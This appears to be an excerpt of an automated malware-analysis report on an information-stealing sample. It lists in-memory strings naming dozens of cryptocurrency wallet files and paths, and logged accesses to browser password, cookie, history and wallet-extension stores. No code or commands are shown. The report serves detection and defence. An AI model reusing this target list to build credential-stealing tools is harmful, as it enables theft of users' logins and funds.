Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
